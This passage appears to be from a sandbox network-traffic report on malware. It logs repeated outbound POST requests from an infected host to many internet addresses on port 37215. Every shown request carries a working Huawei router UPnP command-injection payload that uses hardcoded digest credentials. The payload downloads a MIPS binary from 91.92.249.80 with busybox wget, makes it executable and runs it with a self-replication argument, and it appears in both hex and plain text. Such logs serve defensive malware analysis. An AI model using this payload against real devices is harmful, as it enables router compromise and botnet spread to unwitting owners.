[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2410192.168.2.2359920197.204.9.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.690016985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2411192.168.2.2355810197.166.74.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.690068007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2412192.168.2.235532441.145.204.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.690073013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2413192.168.2.233640041.34.93.11337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.690145016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2414192.168.2.2345768197.215.109.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.690201044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2415192.168.2.233813241.72.6.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.691210032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2416192.168.2.2342164189.239.163.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.691538095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2417192.168.2.234404481.255.104.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.691538095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2418192.168.2.235314657.14.63.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.691591978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2419192.168.2.2339202157.254.186.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.691972017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2420192.168.2.2360996197.151.177.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.692091942 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
